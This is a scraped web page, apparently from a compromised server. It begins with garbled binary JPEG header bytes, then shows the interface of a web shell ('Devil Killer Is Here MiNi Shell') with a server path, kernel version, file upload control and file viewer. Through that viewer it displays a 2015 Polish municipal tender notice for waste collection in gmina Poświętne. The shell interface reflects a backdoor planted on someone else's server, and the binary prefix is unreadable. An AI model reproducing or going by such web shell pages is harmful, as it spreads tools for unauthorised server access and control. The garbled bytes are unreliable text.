JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20151112/304604-N-2015.html

<p class="kh_header"><b>Poświętne: Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy na terenie gminy Poświętne</b><br>
<b>Numer ogłoszenia: 304604 - 2015; data zamieszczenia: 12.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Poświętne , Poświętne 21, 18-112 Poświętne, woj. podlaskie, tel. 085 6501314, faks 085 6501183.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.ug.poswietne.wrotapodlasia.pl/przet/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy na terenie gminy Poświętne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbiór i zagospodarowanie odpadów komunalnych z terenu Gminy Poświętne od właścicieli nieruchomości, na których zamieszkują mieszkańcy w okresie od dnia 01 stycznia 2016 r. do dnia 31 grudnia 2017 roku.,   z zastrzeżeniem, iż wykonawca wyposaży wszystkie nieruchomości w pojemniki i worki na odpady, nie później jednak jak do dnia 31.12.2015 r.
oraz zorganizowanie i prowadzenie Punktu Selektywnej Zbiórki Odpadów Komunalnych PSZOK.

Zakres zamówienia obejmuje :

odbiór i zagospodarowanie  zmieszanych odpadów komunalnych,
2odbiór i zagospodarowanie odpadów komunalnych gromadzonych w sposób selektywny, 
urządzenie, utrzymanie i obsługa centralnego punktu selektywnej zbiórki odpadów komunalnych, 
dostarczenie materiałów informacyjnych, 
dostarczenie mieszkańcom pojemników na odpady zmieszane, 
dostarczenie pojemników na selektywną zbiórkę odpadów na potrzeby urządzenia PSZOK oraz punków wskazanych przez Zamawiającego w zakresie zbiórki przeterminowanych leków oraz zużytych baterii i akumulatorów, 
dostarczenie mieszkańcom worków na selektywną zbiórkę odpadów w trzech kolorach.
                                  
 Obowiązki Wykonawcy w zakresie realizacji zamówienia :

Wykonawca odbierze i zagospodaruje każdą ilość odpadów komunalnych.  
W ramach wykonywania umowy Wykonawca w imieniu Zamawiającego wyposaży bezpłatnie właścicieli nieruchomości zamieszkałych w pojemniki na odpady zmieszane w ilości i o pojemności określonej w Regulaminie utrzymania czystości i porządku na terenie Gminy Poświętne stanowiącym załącznik nr 6 do SIWZ, a także w worki do selektywnej zbiórki poszczególnych frakcji odpadów segregowanych. Pojemniki i worki powinny być dostarczone, nie później jednak niż do dnia  31.12.2015 roku.
Worki powinny posiadać następujące parametry: 
pojemność - nie mniejsza niż 60 litrów
materiał - folia polietylenowa PE-HD LDPE, półprzezroczysta, o grubości zapewniającej wytrzymałość worków tj. co najmniej 60 mikronów, 
 Kolorystyka i przeznaczenie worków: 
niebieski - na papier i tekturę, 
zielony - na szkło, 
żółty - na tworzywa sztuczne, metal i opakowania wielomateriałowe. 
Oznakowanie - worki muszą być opatrzone nadrukiem na jaki rodzaj odpadu 
są przeznaczone. 

Worki do selektywnego zbierania odpadów komunalnych należy przekazywać na bieżąco właścicielowi nieruchomości w systemie na wymianę tzn. za każdy odebrany worek danej frakcji odpadów Wykonawca pozostawia nowy pusty worek, chyba, że właściciel nieruchomości zgłasza zapotrzebowania na większą ilość worków. 

Wykonawca zobowiązany jest do utrzymania pojemników w należytym stanie technicznym i sanitarnym poprzez ich okresowe mycie i dezynfekcję, w miarę zaistniałych potrzeb, nie rzadziej jednak niż 2 razy do roku. 

Obowiązkiem Wykonawcy będzie również posprzątanie wokół ww. pojemników, gdy zajdzie taka potrzeba, między innymi poprzez zabranie dostawionych przy pojemnikach worków z niesegregowanymi (zmieszanymi) odpadami komunalnymi. 

Wykonawca zobowiązany jest do ustawienia specjalistycznych pojemników do zbiórki  przeterminowanych leków oraz zużytych baterii i akumulatorów w wyznaczonych przez Zamawiającego miejscach oraz opróżniania tych pojemników według zapotrzebowania, nie rzadziej jednak niż 4 razy do roku.

 Poniżej określone są miejsca przeznaczone do usytuowania oraz ilość pojemników:

Pojemnik na przeterminowane leki
Nazwa lokalizacji	Adres	Ilości pojemników
Ośrodek Zdrowia TOP MEDIC Poświętne 11, 18-112 Poświętne	1
PSZOK w Poświętnem	Baza Gminnej Spółdzielni Samopomoc Chłopska
w Poświętnem 	1

Pojemnik na zużyte baterie i akumulatory 
Nazwa	Adres	Ilość pojemników
Sklep Spożywczy GS	Poświętne	1
PSZOK w Poświętnem	Baza Gminnej Spółdzielni Samopomoc Chłopska w Poświętnem	1
Koszty wyposażenia nieruchomości w pojemniki i worki oraz utrzymania ich w należytym stanie technicznym i sanitarnym przez okres obowiązywania umowy Wykonawca powinien uwzględnić w swojej cenie ofertowej. 

Wykonawca ma obowiązek odbierania odpadów gromadzonych także w pojnikach będących własnością właścicieli nieruchomości, jeżeli znajdują się w odpowiednim stanie technicznym i sanitarnym. 

Wykonawca w trakcie realizacji umowy zobowiązany jest do informowania właścicieli nieruchomości o szczegółowych zasadach selektywnej zbiórki odpadów. 

W przypadku odbioru odpadów w systemie akcyjnym w formie wystawek Wykonawca zobowiązany jest do przeprowadzenia akcji informacyjnej dotyczącej miejsca i daty przeprowadzania zbiórki odpadów, nie później niż 2 tygodnie przed planowaną zbiórką. Akcja informacja powinna zapewnić dotarcie informacji do wszystkich właścicieli nieruchomości. 
Wykonawca w terminie 5 dni od podpisania umowy przedstawi Zamawiającemu do akceptacji wzór harmonogramu odbioru wszystkich odpadów komunalnych od właścicieli nieruchomości, o których mowa w pkt. 1.4 niniejszej SIWZ, w zastrzeżeniem, że odbiór odpadów zmieszanych i segregowanych powinien odbywać się tego samego dnia.  Zamawiający akceptuje harmonogram lub przedstawi uwagi do niego w terminie 3 dni od jego otrzymania. Wykonawca w terminie 3 dni wprowadzi uwagi Zamawiającego oraz przedstawi go do ponownej akceptacji. Ostateczną wersje harmonogramu Wykonawca wydrukuje na własny koszt i przekaże każdemu gospodarstwu domowemu wraz z workami do segregacji odpadów. Harmonogram powinien być sporządzony z następującymi wytycznymi:
powinien być przejrzysty, pozwalający na szybkie zorientowanie się, co do konkretnych dat odbierania odpadów, jak też regularności i powtarzalności odbierania odpadów komunalnych,
powinien wskazywać na daty odbierania poszczególnych rodzajów odpadów z nieruchomości, 
wykonawca zamieści harmonogram na swojej stronie internetowej i będzie on na niej dostępny przez cały okres obowiązywania umowy. Ponadto Wykonawca przekaże Zamawiającemu harmonogram (w formie elektronicznej w formacie uzgodnionym z Zamawiającym) celem zamieszczenia go na stronie internetowej Zamawiającego. Każda zmiana harmonogramu ma być aktualizowana na ww. stronie internetowej. 
Wykonawca ma obowiązek zapewnienia wymaganego poziomu recyklingu i przygotowania do ponownego użycia następujących frakcji odpadów komunalnych : papieru, metal, tworzyw sztucznych i szkła zgodnie z  Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r.  w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych Dz. U. z 2012 r.  poz. 645. W przypadku nieosiągnięcia ww. poziomów Wykonawca zapłaci Zamawiającemu kary umowne zgodnie z umową.

Wykonawca ma obowiązek zapewnienia wymaganego poziomu recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami innych niż niebezpieczne odpadów budowlanych i rozbiórkowych zgodnie z  Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r.  w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych Dz. U. z 2012 r.  poz. 645. W przypadku nieosiągnięcia ww. poziomów Wykonawca zapłaci Zamawiającemu kary umowne zgodnie z umową. 


Wykonawca ma obowiązek zapewnienia wymaganego poziomu ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania zgodnie z  Rozporządzeniem Ministra Środowiska z dnia 25 maja 2012 r.  w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów  Dz. U. z 2012 r.  poz. 676. W przypadku nieosiągnięcia ww. poziomów Wykonawca zapłaci Zamawiającemu kary umowne zgodnie z umową.

Wykonawca będzie prowadził i przedkładał Zamawiającemu dokumentację z realizacji zamówienia tj.:
Półroczne sprawozdanie zgodnie z art. 9n ustawy o utrzymaniu czystości i porządku w gminach, W półrocznych okresach rozliczeniowych potwierdzone za zgodność z oryginałem kserokopie kart przekazania odpadów sporządzone zgodnie z Rozporządzeniem Ministra Środowiska z dnia 12 grudnia 2014 r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji opadów Dz. U. z 2014 r. poz. 1973. W półrocznych okresach rozliczeniowych informacje o ilości i rodzaju przyjętych odpadów do PSZOK, oraz miejscach ich zagospodarowania. 
Roczne sprawozdanie z prowadzenia PSZOK zgodnie z art. 9na ustawy o utrzymaniu czystości i porządku w gminach. 

Wykonawca ma obowiązek okazania Zamawiającemu na jego żądanie dokumentów, sporządzanych na potrzeby ewidencji odpadów oraz dokumentów potwierdzających osiągnięcie określonych poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania. 

Wykonawca zobowiązany będzie do monitorowania obowiązku ciążącego na właścicieli nieruchomości w zakresie selektywnego zbierania odpadów komunalnych. W przypadku stwierdzenia, że właściciel nieruchomości nie wywiązuje się z obowiązku w zakresie segregacji odpadów, Wykonawca odbiera odpady jako niesegregowane  zmieszane odpady komunalne. Wykonawca zobowiązany będzie w terminie 2 dni roboczych od dnia zaistnienia opisanej sytuacji do pisemnego lub drogą elektroniczną poinformowania Zamawiającego o nie wywiązaniu się z obowiązków segregacji odpadów przez właściciela nieruchomości. Informacja powinna być przedstawiona w formie oświadczenia i protokołu z zaistniałego zdarzenia. Z dokumentacji musi jednoznacznie wynikać, jakiej dotyczy nieruchomości, w jakim dniu i o jakiej godzinie doszło do ustalenia w/w zdarzenia. 

Wykonawca zobowiązany będzie do prowadzenia jednego Punktu Selektywnej Zbiórki Odpadów Komunalnych PSZOK na terenie  Bazy Gminnej Spółdzielni Samopomoc Chłopska w Poświętnem, wyposażenia go w odpowiednie pojemniki oraz do monitorowania stanu zapełnienia pojemników oraz odbierania opadów z taką częstotliwością, aby nie powodowało to przepełnienie tych pojemników. PSZOK powinien być czynny co najmniej 1 raz w tygodniu w godzinach 8-15 w wybrany dzień od poniedziałku do soboty. Koszt wynajmu nieruchomości na potrzeby PSZOK ponosi Wykonawca. Wykonawca zawrze umowę z GS Poświętne na wynajem nieruchomości na potrzeby prowadzenia PSZOK.

Ponadto, w ramach prowadzenie PSZOK : 

Wykonawca opracuje i przedłoży do akceptacji Zamawiającemu Regulamin funkcjonowania PSZOK-u do dnia 15 grudnia 2015 r., określający zasady i warunki przyjmowania selektywnie zebranych odpadów od mieszkańców Gminy Poświętne  uwzględniający:
zasady unormowane w Regulaminie utrzymania czystości i porządku na terenie gminy Poświętne,
przyjmowanie płynnych odpadów niebezpiecznych w oryginalnych, nieuszkodzonych opakowaniach producenta, zawierających etykiety,
prowadzenie ewidencji jakościowej i ilościowej przyjmowanych odpadów. 
Wykonawca jest zobowiązany do dnia 01.01.2016 r., na własny koszt zamontować w widocznym miejscu tablicę informacyjną, wykonaną w taki sposób, aby informacje były czytelne i zawierały następujące dane: 
nazwa: Punkt Selektywnego Zbierania Odpadów Komunalnych  w Poświętnem, 
godziny przyjmowania odpadów,
nazwa, adres i numer telefonu Wykonawcy.
Wykonawca ponosi koszty zagospodarowania odpadów przyjętych w PSZOK. 

Wymagania dotyczące instalacji do jakiej mają trafić odpady : 

Zmieszane odpady komunalne, odpady zielone oraz pozostałości z sortownia odpadów przeznaczonych do składowania Wykonawca zobowiązany jest do przekazania do wskazanej w Planie Gospodarki Odpadami Województwa Podlaskiego na lata 2012 - 2017 Regionalnej Instalacji Przetwarzania Odpadów Komunalnych w Czerwonym Borze.

Selektywnie zebrane odpady komunalne Wykonawca przekazywać będzie do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 roku o odpadach Dz. U. z 2013 r. poz. 21 z późn. zm.. 

Sposób i częstotliwość odbioru przez Wykonawcę stałych odpadów komunalnych:

	odpady zmieszane  kod 20 03 01 odbierane będą z pojemników ustawionych w miejscach wskazanych przez właścicieli nieruchomości. Częstotliwość odbioru odpadów : 
zabudowa jednorodzinna - raz w miesiącu, 
zabudowa wielorodzinna - raz na dwa tygodnie. 
	odpady zbierane selektywnie, w tym odpady opakowaniowe, z podziałem na następujące frakcje: papier i tektura  kod 15 01 01, 20 01 01 , szkło  kod 15 01 07, 20 01 02,   metal, tworzywa sztuczne i opakowania wielomateriałowe  kod 20 01 39, 15 01 02, 20 01 40, 15 01 04, 15 01 05, odbierane będą z worków lub pojemników o kolorach odpowiednio niebieskim, zielonym i żółtym. Częstotliwość odbioru odpadów :
zabudowa jednorodzinna - raz w miesiącu, 
zabudowa wielorodzinna - raz na dwa tygodnie.  
przeterminowane leki kod  20 01 31, 20 01 32 oraz zużyte baterie i akumulatory  kod 20 01 33, 20 01 34*:
z PSZOK, 
ze wskazanych przez Zamawiającego miejsc. Wykonawca zobowiązany będzie monitorować zapełnienie pojemników we wskazanych przez Zamawiającego miejscach  i odbierać odpady w takiej częstotliwości, aby nie powodowało to przepełnienia tych pojemników, nie rzadziej jednak niż raz na kwartał,  meble i inne odpady wielkogabarytowe ( kod 20 03 07); zużyte opony ( kod 16 01 03); zużyty sprzęt elektryczny i elektroniczny ( kod 20 01 23, 20 01 35*, 20 01 36); chemikalia ( kod 20 01 13*, 20 01 14*, 20 01 15, 20 01 17*, 20 01 19*, 20 01 25, 20 01 26*, 20 01 27*, 20 01 28, 20 01 29*, 20 01 30, 20 01 80); odpady budowlane i rozbiórkowe, w tym styropian ( kod 17 01 01, 17 01 02, 17 01 03, 17 01 07, 17 01 80, 17 02 01, 17 02 02, 17 02 03, 17 06 04, 17 09 04, 20 03 99):
z PSZOK gdzie znajdować się będą pojemniki do zbierania odpadów. Wykonawca zobowiązany będzie monitorować stan zapełnienia pojemników i odbierać odpady w takiej częstotliwości, aby nie powodowało to przepełnienia tych pojemników
w formie wystawek tj. wystawianych przed posesję, odbierane będą przez Wykonawcę od właścicieli nieruchomości co najmniej raz na kwartał zgodnie z ustalonym przez Wykonawcę i uzgodnionym z  Zamawiającym harmonogramem.

Ogólna charakterystyka Gminy Poświętne w kontekście odbioru i zagospodarowania odpadów. 

Dane na dzień 30.09.2015 r. 

szacunkowa liczba mieszkańców, liczba gospodarstw domowych ( na podstawie złożonych deklaracji na dzień 30.09.2015 r ) oraz liczba osób zameldowanych na terenie Gminy Poświętne:

L.p.	Miejscowość	Szacunkowa liczba mieszkańców	Liczba gospodarstw domowych	Liczba osób zameldowanych
( stan na dzień 30.09.2015 r. )
Brzozowo Antonie	76	18	89
Brzozowo Chabdy	37	9	48
Brzozowo Chrzczonki	41	12	48
Brzozowo Chrzczony	61	16	62
Brzozowo Korabie	76	17	91
Brzozowo Muzyły	56	11	67
Brzozowo Panki	100	19	111
Brzozowo Solniki	47	13	53
Brzozowo Stare	97	37	160
Chomizna	39	10	65
Dzierżki	66	19	100
Dzierżki Ząbki	29	9	31
Gabrysin	97	29	117
Gołębie	96	29	126
Grochy	142	40	209
Józefin	72	16	86
Kamińskie Jaski	44	12	53
Kamińskie Ocioski	41	11	64
Kamińskie Pliszki	29	6	29
Kamińskie Wiktory	70	15	77
Liza Nowa	88	17	100
Liza Stara 	180	47	213
Łukawica	66	18	104
Marynki	72	17	91
Pietkowo	203	51	240
Pietkowo Drugie	65	11	78
Porośl Głuchy	32	7	40
Porośl Wojsławy	132	36	198
Poświętne	190	56	244
Turek	57	14	62
Wilkowo Nowe	61	16	102
Wilkowo Stare	165	42	200
Wołkuny	27	9	42
Zdrody Nowe	104	31	144
Zdrody Stare	93	29	104
	Razem	2880	749	3648

Odbiór odpadów prowadzony będzie w 35 miejscowościach na terenie Gminy Poświętne. Wykaz nieruchomości, z których odbierane będą odpady komunalne z podziałem na sposób zbierania odpadów sektywny nieselektywny. Zamawiający przekaże Wykonawcy w terminie 10 dni od dnia zawarcia umowy. 

Zakłada się, że w okresie obowiązywania zawartej w wyniku udzielenia niniejszego zamówienia umowy, ilość nieruchomości objętych systemem  zbiórki odpadów może ulegać zmianom w przedziale +- 5 % w stosunku do ilości aktualnej.
 


w Gminie Poświętne w latach w 2013, 2014 oraz 6 miesięcy 2015 r. zebrano następujące ilości odpadów komunalnych:
Lp.	Rodzaj odpadów	Masa odpadów [Mg]
		2013 rok	2014 rok	2015 rok
( I półrocze)
1		20 03 01 Niesegregowane (zmieszane) odpady komunalne	231,5	150,8	48,79
2		15 01 06 Zmieszane odpady opakowaniowe	27,3	46,3	-
3		15 01 02 Opakowania z tworzyw sztucznych	1,1	6,6	4,1
4		15 01 01 Opakowania z papieru i tektury	0,6	13,9	5,2
5		15 01 07 Opakowania ze szkła	1,6	-	6,0
6		15 01 10 Opakowania zawierające pozostałości substancji niebezpiecznych lub mini zanieczyszczone	0,1	0,1	0,1
7		16 01 03 Zużyte opony	1,3	5,4	2,8
8		20 01 23 Urządzenia zawierające freony	0,2	0,5	0,4
9		20 01 35 Zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21 i 20 01 23 zaw. niebezpieczne składniki	0,2	1,3	0,3
10		20 01 36 Zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21, 20 01 23 i 20 01 35	0,2	1,8	0,3
11		20 02 03 Inne odpady nie ulegajace biodegradacji	-	8,6	1,5
12		20 03 07 Odpady wielkogabarytowe	3,4	3,3	3,6
13		20 01 99 Inne nie wymienione frakcje zbierane z sposób selektywny	0,1	-	-


3)	Szacunkowa ilość pojemników, którą Wykonawca zobowiązany jest zabezpieczyć wynosi:

Wielkość gospodarstwa domowego	Ilość gospodarstw domowych	Wariant I same pojemniki 120 litrowe	Wariant II pojemniki 240 litrowe + 120 litrowe
			
		Ilość pojemników 120 l w gospodarstwie	Iloczyn liczby pojemników i liczby gospodarstw	Ilość pojemników 120 l w gospodarstwie	Iloczyn liczby pojemników 120 l i liczby gospodarstw	Ilość pojemników 240 l w gospodarstwie	Iloczyn liczby pojemników 240 l i liczby gospodarstw
Do 3 osób	380	1	380	1	380	0	0
4-6 osób	285	2	570	0	0	1	285
7-10 osób	79	3	237	1	79	1	79
11-15 osób	5	4	20	0	0	2	10
Powyżej 15 osób	0	0	0	0	0	0	0
Razem	749	Razem	1207	Razem	459		374.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 3 500,00 zł trzy tysiące pięćset złotych 00 gr.

Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej formie:

w pieniądzu, przelewem na rachunek bankowy: 
69 8081 0009 0000 3955 20000040 Bank Spółdzielczy w Łapach  z adnotacją Wadium - odbiór i zagospodarowanie odpadów 

w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,

w gwarancjach bankowych, 

w gwarancjach ubezpieczeniowych 

w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275) 
w terminie do dnia 20 listopada 2015 r, godz. 9.30
sposób przekazania: dowód wniesienia wadium należy załączyć do składanej oferty

Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 

W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia wymaga posiadania przez wykonawcę wpisu do rejestru działalności regulowanej w gminie Poświętne. Ocena spełnienia warunku na podstawie zaświadczenia o wpisie do rejestru działalności regulowanej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy spełniają wymagania wynikające z Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 roku w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U z 2013 r , poz. 122). Ocena spełnienia warunku na podstawie oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Ocena spełnienia warunku na podstawie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
